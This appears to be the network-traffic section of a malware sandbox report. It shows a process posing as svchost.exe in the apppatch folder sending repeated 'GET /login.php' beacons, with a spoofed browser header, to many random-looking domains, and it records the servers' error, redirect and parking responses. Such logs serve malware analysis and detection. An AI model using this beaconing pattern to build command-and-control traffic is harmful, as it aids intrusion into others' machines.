Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:53:52.269407988 CEST | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galyqaz.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.9 | 57336 | 3.64.163.50 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:53:52.312402964 CEST | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puzylyp.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.9 | 57338 | 208.100.26.245 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:53:52.326431990 CEST | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyvyxor.com
Sep 8, 2024 10:53:52.818684101 CEST | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 08 Sep 2024 08:53:52 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Sep 8, 2024 10:53:52.852519989 CEST | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyvyxor.com
Sep 8, 2024 10:53:52.970581055 CEST | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 08 Sep 2024 08:53:52 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.9 | 57339 | 188.114.96.3 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:53:52.329917908 CEST | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyhig.com
Sep 8, 2024 10:53:53.532174110 CEST | 787 | IN | HTTP/1.1 301 Moved Permanently
Date: Sun, 08 Sep 2024 08:53:53 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://qegyhig.com/login.php
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oewMEPCko3g4tmSchmNkX6g879LSK9ycWCk4UZj6EFC3WuxDeJmJe9KoyeVkd2ewLK2PbhNlp%2B0x0xiL1AMWcUFPrCShybZQFLhwClpSTEzrDNDmDxnEhEp8g1ZDEA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bfdb5ec8ea15e82-EWR
alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Sep 8, 2024 10:53:55.452831984 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
Sep 8, 2024 10:53:56.261188984 CEST | 797 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:56 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://qegyhig.com/login.php
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iwTxBm%2Bp8Bm%2Bi9jwmdKg5lymp0LxSVjlaG2Ov9H8ClooMC8QH3BEViKW%2F4E%2BMKLCoCzuLLtFNu2hr5p47YGvPAh65dJPOSGpVL%2B1M6u7ykDLtsjo%2FWZViKCNJNIRiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb5fde8d25e82-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
40 | 192.168.2.9 | 57340 | 3.64.163.50 | 80
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:53:52.333750963 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vojyqem.com
Sep 8, 2024 10:53:52.964428902 CEST | 689 | IN | HTTP/1.1 410 Gone
                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:52 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 542
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Sep 8, 2024 10:53:53.979569912 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vojyqem.com
Sep 8, 2024 10:53:54.166145086 CEST | 689 | IN | HTTP/1.1 410 Gone
                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:54 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 542
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.9 | 57337 | 154.212.231.82 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:53:52.340037107 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gadyniw.com
Sep 8, 2024 10:53:53.286087036 CEST | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:53 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Sep 8, 2024 10:53:53.979286909 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gadyniw.com
Sep 8, 2024 10:53:54.373919964 CEST | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:54 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.9 | 57341 | 162.255.119.102 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:53:52.352837086 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gahyqah.com
Sep 8, 2024 10:53:53.076623917 CEST | 303 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:53 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Content-Length: 55
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: http://www.gahyqah.com/login.php
                                                                                                                                                                                                          X-Served-By: Namecheap URL Forward
                                                                                                                                                                                                          Server: namecheap-nginx
                                                                                                                                                                                                          Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                          Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.9 | 57342 | 91.195.240.19 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:53:53.368252993 CEST | 271 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: www.gahyqah.com
                                                                                                                                                                                                          Connection: Keep-Alive
Sep 8, 2024 10:53:54.036604881 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          date: Sun, 08 Sep 2024 08:53:53 GMT
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          transfer-encoding: chunked
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                          cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==
                                                                                                                                                                                                          last-modified: Sun, 08 Sep 2024 08:53:53 GMT
                                                                                                                                                                                                          x-cache-miss-from: parking-7768d5b45d-rblrk
                                                                                                                                                                                                          server: Parking/1.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.9 | 57345 | 199.191.50.83 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:54:00.285054922 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: galyqaz.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.9 | 57346 | 3.64.163.50 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:54:00.285218954 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: puzylyp.com
Sep 8, 2024 10:54:03.917979002 CEST | 689 | IN | HTTP/1.1 410 Gone
                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:54:03 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 542
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.9 | 57347 | 188.114.96.3 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:54:04.384114981 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
Sep 8, 2024 10:54:05.108606100 CEST | 791 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:54:05 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://lysyvan.com/login.php
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w1EuiOZCqge%2Bj%2Fa6mAb1P6l%2BnJ1X8wl9bM0nxEGacgUNrmhZm0K8RGaaNvX3eNwHvA9350WALNpqGiube59fH3HXBwtjtkNPeG5IMhfYo6oOiXEORa38tVkexb2HNQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb637ff7f438e-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Sep 8, 2024 10:54:07.387229919 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
Sep 8, 2024 10:54:07.728256941 CEST | 620 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:54:07 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://lysyvan.com/login.php
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5DgONK7fSi9uaQs4psh4VGtJ56ODpyDpA9p9syCd0rr%2BHH96xYt4fXk3%2BHhe6hpNrfaK1q5gGsZTd5uwTaORcBy7BAtx6DkxtM7FF3RCo043pGE4YF7hOmscs%2FmD%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb6487871438e-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
Sep 8, 2024 10:54:07.819145918 CEST | 173 | IN
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
47  192.168.2.9  57348  103.150.11.230  80  1512  C:\Windows\apppatch\svchost.exe
Timestamp  Bytes transferred  Direction  Data
Sep 8, 2024 10:54:05.038834095 CEST  243  OUT  GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyrysor.com
Sep 8, 2024 10:54:05.958220005 CEST  403  IN  HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                          Server: openresty/1.15.8.1
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:54:05 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 151
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: http://106.15.36.143:8001/dh/147287063_414682.html#index8?d=lyrysor.com
                                                                                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
Sep 8, 2024 10:54:11.619841099 CEST  243  OUT  GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyrysor.com
Sep 8, 2024 10:54:11.965871096 CEST  403  IN  HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                          Server: openresty/1.15.8.1
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:54:11 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 151
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: http://106.15.36.143:8001/dh/147287063_414682.html#index8?d=lyrysor.com
                                                                                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
48  192.168.2.9  57349  106.15.36.143  8001  1512  C:\Windows\apppatch\svchost.exe
Timestamp  Bytes transferred  Direction  Data
Sep 8, 2024 10:54:06.185220003 CEST  289  OUT  GET /dh/147287063_414682.html HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: 106.15.36.143:8001
                                                                                                                                                                                                          Connection: Keep-Alive
Sep 8, 2024 10:54:11.616518974 CEST  722  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: openresty/1.21.4.3
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:54:11 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 561
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Sep 8, 2024 10:54:11.967032909 CEST  289  OUT  GET /dh/147287063_414682.html HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: 106.15.36.143:8001
                                                                                                                                                                                                          Connection: Keep-Alive
Sep 8, 2024 10:54:12.325288057 CEST  722  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: openresty/1.21.4.3
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:54:12 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 561
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
49  192.168.2.9  57352  103.224.212.108  80  1512  C:\Windows\apppatch\svchost.exe
Timestamp  Bytes transferred  Direction  Data
Sep 8, 2024 10:54:12.368230104 CEST  277  OUT  GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyxynyx.com
                                                                                                                                                                                                          Cookie: __tad=1725785613.7387215
Sep 8, 2024 10:54:12.974900007 CEST  244  IN  HTTP/1.1 302 Found
                                                                                                                                                                                                          date: Sun, 08 Sep 2024 08:54:12 GMT
                                                                                                                                                                                                          server: Apache
                                                                                                                                                                                                          location: http://ww25.lyxynyx.com/login.php?subid1=20240908-1854-12c0-8240-bdabdc5d8efa
                                                                                                                                                                                                          content-length: 2
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                          Data Raw: 0a 0a
                                                                                                                                                                                                          Data Ascii:


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
50  192.168.2.9  57353  103.224.182.252  80  1512  C:\Windows\apppatch\svchost.exe
Timestamp  Bytes transferred  Direction  Data
Sep 8, 2024 10:54:12.515113115 CEST  277  OUT  GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vofycot.com
                                                                                                                                                                                                          Cookie: __tad=1725785614.8678415
Sep 8, 2024 10:54:13.155999899 CEST  242  IN  HTTP/1.1 302 Found
                                                                                                                                                                                                          date: Sun, 08 Sep 2024 08:54:13 GMT
                                                                                                                                                                                                          server: Apache
                                                                                                                                                                                                          location: http://ww16.vofycot.com/login.php?sub1=20240908-1854-132f-8c2f-134916a1e9d0
                                                                                                                                                                                                          content-length: 2
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                          Data Raw: 0a 0a
                                                                                                                                                                                                          Data Ascii:


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
51  192.168.2.9  57354  154.85.183.50  80  1512  C:\Windows\apppatch\svchost.exe
Timestamp  Bytes transferred  Direction  Data
Sep 8, 2024 10:54:12.589468956 CEST  243  OUT  GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyval.com
Sep 8, 2024 10:54:13.488347054 CEST  307  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:54:13 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 138
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          ETag: "663ee226-8a"
